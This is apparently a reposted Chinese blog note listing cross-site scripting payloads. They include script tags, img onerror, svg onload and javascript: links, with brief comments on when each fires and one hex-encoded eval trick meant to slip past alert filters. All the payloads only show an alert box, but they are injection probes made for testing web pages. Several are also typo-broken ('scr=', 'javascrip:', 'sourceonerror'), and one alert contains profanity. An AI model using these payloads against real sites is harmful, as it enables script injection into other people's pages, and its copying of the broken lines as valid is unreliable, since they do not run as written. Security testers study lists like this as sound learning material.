xss payload


<script>alert(xss)</script>


<img scr=1 onerror=alert('xss')>當找不到圖片名為1的文件時,執行alert('xss')
<a href=javascrip:alert("xss")>s</a> 點擊s時運行alert('xss')
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執行彈窗
onclick='alert(/fuck/)

 


<IMG?SRC="javascript:alert('XSS');">

 

<img src="" "Alert(/test/)">

<img src=x onerror=alert(xss)>

<img src=1 onerror=alert(1)>
是當圖片沒有找到路徑(即src=“路徑:可以使相對路徑也可以使絕對路徑”找不到圖片)就會 彈出消息框,顯示 1 ,就是onerror=alert(1)起的作用
<img src=1 onerror=alert(1)>


<details/open/ontoggle=alert(1)>

<svg/onload=alert(1)>

<img/src/onerror=alert(1)>

<video/src/onerror=alert(1)>

<script>(alert)(1)</script>

<video><sourceonerror="javascript:alert(1)">

<video/src/onloadstart="alert(1)">

<ahref=javascript:alert(1)>222</a>


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM